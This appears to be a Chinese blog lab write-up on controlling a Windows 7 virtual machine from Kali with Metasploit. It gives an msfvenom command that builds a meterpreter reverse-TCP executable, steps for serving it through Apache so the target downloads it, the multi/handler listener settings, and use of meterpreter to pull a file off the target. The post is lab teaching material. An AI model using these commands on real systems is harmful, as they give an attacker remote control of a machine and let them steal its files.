【简单远程控制】 Metasploit应用

一、实验环境

kali虚拟机,靶机win7,(都为NAT模式)

二、实验内容

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

三、实验步骤

(1)在kali生成被控端
打开kali终端输入命令,在本地生成攻击荷载

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.47.128 lport=5000 -f exe -o /root/payload.exe


在这里插入图片描述
生成完毕,在将该荷载放到目标靶机上,此时kali就是主控端,靶机是被控端。
PS:在把荷载复制到目标靶机上的时候,可以先把它移动到主机,在从主机移动到靶机;也可以在kali搭建一个网站,将下载链接挂上去,再用靶机去访问这个网站,从而下载下来。(记录一下第二个方法的步骤)
①先在终端查看荷载的存放位置,输入命令ls;

②将荷载的目录地址复制过来,挂到网页上,文件名是 1.exe

命令:cd ./payload/var/www/html/1.exe

在这里插入图片描述
③输入命令:

service apache2 start
service apache2 status
cd /var/www/html
ls

在这里插入图片描述
④在kali的浏览器里输入环回地址:127.0.0.1/1.exe
在这里插入图片描述
⑤最后去靶机的浏览器输入命令:192.168.47.128/1.exe 即可下载
在这里插入图片描述

(2)获得靶机(Windows)的控制权
1.打开kali终端,输入msfconsole命令即可打开Metasploit
在这里插入图片描述
2.使用攻击模块
输入命令:

 use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 set lhost 192.168.47.128
 set lport 5000
 exploit

在这里插入图片描述
3.然后打开靶机,多次点击攻击荷载,此时kali已经开始监听靶机的行为,我们从网上下载一张图片,下载了以后,在kali也会出现靶机所下载的内容
在这里插入图片描述
图片名其实是1,当时多搞了个文件名,其实kali这边已经帮写好文件名了,然后就多了一个 jpg
(3)下载靶机上的任一文件
1.我们直接下载刚刚靶机下载的那种图片即可,输入download命令
在这里插入图片描述
2.最后打开kali的文件夹,输入下载的图片的存放目录/home/,找到了靶机下载的那张图片,我们已经将他下载下来,复现完毕!
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值